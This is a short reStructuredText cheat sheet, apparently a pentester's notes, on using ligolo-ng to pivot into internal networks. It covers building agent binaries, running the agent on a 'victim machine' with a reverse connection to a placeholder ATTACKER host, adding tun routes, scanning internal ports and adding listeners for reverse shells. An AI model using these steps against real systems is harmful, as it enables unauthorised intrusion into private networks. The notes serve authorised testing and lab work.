######
Ligolo
######

| Ligolo allows you to access distant networks over a client/server connection, using tun interfaces.
| https://github.com/nicocha30/ligolo-ng
| https://docs.ligolo.ng/
| https://docs.ligolo.ng/sample/basic/
| https://jvsautomate.com/blog/Ligolo-ng-Multi-Pivot-My-Methods/

|

*****
Build
*****

| Using docker golang latest image to build static ligolo binaries into /var/www/html/

.. code-block:: bash

    git clone https://github.com/nicocha30/ligolo-ng /opt/git/ligolo

.. code-block:: bash

    CMD='cd /src;'
    CMD+='env GOARCH=amd64 CGO_ENABLED=0 go build -o /w/ligolo cmd/agent/main.go;'
    CMD+='go build -o proxy cmd/proxy/main.go;'
    CMD+='env GOOS=windows GOARCH=amd64 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc go build -o /w/ligolo.exe cmd/agent/main.go;'
    docker run -v /var/www/html/:/w -v /opt/git/ligolo:/src/ --rm -it golang /bin/bash -c "$CMD"

|

*****
Start
*****

| Start ligolo server on your machine, it will print the certificate fingerprint.

.. code-block:: bash

    sudo /opt/git/ligolo/proxy -selfcert -laddr 0.0.0.0:443

|

| Start client (agent) on victim machine, using bind or reverse connection.

.. code-block:: bash

    # Reverse connection
    ./ligolo -connect ATTACKER:443 -accept-fingerprint REPLACEWITHFINGERPRINT

.. code-block:: bash

    # Or bind connection
    ./ligolo -bind VICTIM:443
    
    # Then connect to victim from server
    ligolo-ng » connect_agent --ip VICTIM:443

|

*****
Route
*****

| You can now add a route on your attacker machine.
| For each ligolo session tunnel you need to add an new interface.
| Ligolo have interfaces features but i prefer to use system commands, that will also work when ligolo start as user.
| Here is an example to add ligolo1 interface for "user" user, with 172.16.1.0/24 route

.. code-block:: bash

    sudo ip tuntap add user user mode tun ligolo1
    sudo ip link set ligolo1 up
    sudo ip route add 172.16.1.0/24 dev ligolo1

|

| Then start tunnel in ligolo

.. code-block:: bash

    ligolo-ng » session 
    ? Specify a session : 1 - user@TARGET - 10.10.110.123:58864 - 53e05e5a-d274-44d6-a7c9-03f47f593f59
    [Agent : user@target] » start --tun ligolo1

|

| Use interface_list to list interfaces routes

|

| If you need to remove interface

.. code-block:: bash

    sudo ip link set ligolo1 down
    sudo ip tuntap del dev ligolo1

|

| If you need to remove route

.. code-block:: bash

    sudo ip route del 172.16.1.0/24

|

| If you need to expose targeted machines local ports, use the 240.0.0.1 ip

.. code-block:: bash

    sudo ip route add 240.0.0.1/32 dev ligolo1
    nmap 240.0.0.1 -sV
    sudo ip route del 240.0.0.1/32

|

********
Listener
********

| https://docs.ligolo.ng/Listeners/
|
| Ligolo allow you to bind distant ports and redirect traffic back to your machine (or anywhere else)
| You can use it to chain ligolo pivots, or to listen for reverseshell connection in a specific network

.. code-block:: bash

    ligolo-ng » session 
    ? Specify a session : 1 - user@TARGET - 10.10.110.123:58864 - 53e05e5a-d274-44d6-a7c9-03f47f593f59
    [Agent : user@target] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp

|